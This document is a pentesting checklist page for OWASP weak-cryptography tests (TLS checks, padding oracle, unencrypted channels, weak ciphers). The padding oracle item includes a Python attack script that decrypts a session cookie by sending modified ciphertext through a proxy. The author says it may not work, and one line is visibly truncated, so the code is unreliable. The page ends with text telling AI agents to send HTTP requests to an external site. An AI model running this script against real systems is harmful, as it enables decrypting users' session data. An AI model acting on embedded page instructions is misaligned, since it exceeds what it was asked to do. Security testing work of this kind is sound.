# 4.9 Testing for Weak Cryptography

## [Testing for Weak Cryptography](https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/README)

## 4.9.1 [Testing for Weak Transport Layer Security](https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/01-Testing_for_Weak_Transport_Layer_Security)

* [ ] Use `testssl.sh` tool and look in the "Testing vulnerabilities" section if there is any vulnerability

**Evidence**:

```
​
```

## 4.9.2 [Testing for Padding Oracle](https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/02-Testing_for_Padding_Oracle)

* [ ] Use tools like [PadBuster](https://github.com/AonCyberLabs/PadBuster) in order to perform Padding Oracle attacks againstg a cookie.
* [ ] I have created the following script, not sure if it works.

```python
import requests
import base64
import urllib.parse
import urllib3
​
# Suppress only the InsecureRequestWarning
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
​
# Target URL
url = "<URL>"
​
# Proxy configuration
proxies = {
    'http': 'http://127.0.0.1:8080',  # Set your proxy here
    'https': 'http://127.0.0.1:8080'  # Set your proxy here
}
​
# Original cookie (URL decoded)
original_cookie = "<COOKIE>"
​
# Decode the cookie (it's URL encoded)
cookie_value = urllib.parse.unquote(original_cookie)
​
# Convert the cookie value from Base64 (replace URL-safe characters)
ciphertext = base64.b64decode(cookie_value)
​
# Splitting the ciphertext into blocks (assuming AES block size of 16 bytes)
block_size = 16
blocks = [ciphertext[i:i+block_size] for i in range(0, len(ciphertext), block_size)]
​
# Function to send a request with a modified cookie and check for padding errors
def check_padding_oracle(modified_ciphertext):
    # Base64 encode the modified ciphertext and URL encode it
    modified_cookie = base64.b64encode(modified_ciphertext).decode().replace('+', '-').replace('/', '_').rstrip('=')
    modified_cookie = urllib.parse.quote(modified_cookie)
​
    # Send the request with the modified cookie
    cookies = {'NotificationStateV2.0': modified_cookie}
    response = requests.get(url, cookies=cookies, proxies=proxies, verify=False)  # verify=False to skip SSL warnings)
​
    # Check for a padding error based on the response
    # You may need to change this based on how the server responds (403, 500, specific message, etc.)
    if response.status_code == 500:  # Adjust this condition as needed
        return True  # Padding error
    return False
​
# Padding Oracle Attack logic
def padding_oracle_attack(blocks):
    decrypted_blocks = []
    for block_index in range(1, len(blocks)):
        decrypted_block = bytearray(block_size)  # Store decrypted bytes for this block
        intermediate_state = bytearray(block_size)  # Store intermediate state bytes
​
        previous_block = blocks[block_index - 1]
        current_block = blocks[block_index]
​
        # Decrypt each byte in the current block
        for byte_index in range(1, block_size + 1):
            padding_value = byte_index
​
            # Try all possible byte values to guess the correct padding
            for guess in range(256):
                # Modify the previous block to produce the correct padding
                modified_block = bytearray(previous_block)
                for i in range(1, padding_value):
                    modified_block[-i] ^= intermediate_state[-i] ^ padding_value
​
                modified_block[-padding_value] ^= guess
​
                # Concatenate the modified previous block and the current block
                modified_ciphertext = bytes(modified_block) + bytes(current_bl
                # Check if we found the correct padding
                if check_padding_oracle(modified_ciphertext):
                    intermediate_state[-padding_value] = guess ^ padding_value
                    decrypted_block[-padding_value] = intermediate_state[-padding_value] ^ previous_block[-padding_value]
                    break
​
        decrypted_blocks.append(decrypted_block)
​
    return b''.join(decrypted_blocks)
​
# Launching the attack
if __name__ == "__main__":
    decrypted = padding_oracle_attack(blocks)
    print("Decrypted message:", decrypted)
```

**Evidence**:

```
​
```

## 4.9.3 [Testing for Sensitive Information Sent via Unencrypted Channels](https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/03-Testing_for_Sensitive_Information_Sent_via_Unencrypted_Channels)

* [ ] Check if the application performs any request over HTTP.

**Evidence**:

```
​
```

## 4.9.4 [Testing for Weak Encryption](https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption)

* [ ] Based on the `testssl.sh` output.
  * [ ] Check if the "Testing cipher categories" offers CBC ciphers.
  * [ ] In "Testing robust forward secrecy" check that algorithms like SHA1 or MD5 are not offered.

**Evidence**:

```
​
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://the-pentesting-guide.marmeus.com/web-owasp-test-cases/4.9-testing-for-weak-cryptography.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.